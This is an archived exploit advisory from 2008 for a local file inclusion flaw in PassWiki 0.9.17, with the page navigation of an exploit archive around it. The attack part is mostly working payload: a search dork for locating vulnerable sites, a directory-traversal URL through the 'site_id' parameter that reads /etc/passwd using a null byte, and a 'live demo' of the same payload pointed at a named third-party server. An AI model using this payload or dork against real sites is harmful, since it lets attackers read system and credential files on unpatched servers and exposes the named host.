passwiki0917-lfi.txt

passwiki0917-lfi.txt: Posted Oct 21, 2008; Authored by r45c4l | Site darkc0de.com; PassWiki versions 0.9.17 and below suffer from a local file inclusion vulnerability. This is a five month old vulnerability that remains unpatched as new versions come out. Consumer beware!; tags | exploit, local, file inclusion; SHA-256 | 8c02bbaa5018efa02295c143cae09f3f5d92e2b4db38cc33d72126868b1316d4; Download | Favorite | View

passwiki0917-lfi.txt

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#-Marezzi-P47tr1ck- FeDeReR-MAGE-JeTFyrE- DON-Outlawz-aymbrbr  #
#        and all darkc0de and DarkTrix members              ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com & darktrix.info
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: PassWiki 0.9.17 "site_id" Local File Inclusion Vulnerability
# 
#
###########################################################
#
# d0rk: "powered by PassWiki 0.9.17"
#
###########################################################
 
     This is taken from the original advisory which was provided by mozi2weed[at]yahoo[dot]com, here http://milw0rm.com/exploits/5704.

     The affected version was 0.9.16 RC 3 and the solution was suggested to upgrade to version 0.9.17, which can be found here 

     http://secunia.com/advisories/30496/


     POC: 

  http://site.com/[path]/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00

     Live Dem0:

  http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00




###########################################################
#
#  Bug discovered : 20 Oct 2008
###########################################################

Top Authors In Last 30 Days

Red Hat 250 files
Ubuntu 111 files
indoushka 49 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Debian 12 files
Jim Blankendaal 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,085)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,603)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,440)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,724)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

passwiki0917-lfi.txt

passwiki0917-lfi.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

passwiki0917-lfi.txt

Share This

passwiki0917-lfi.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems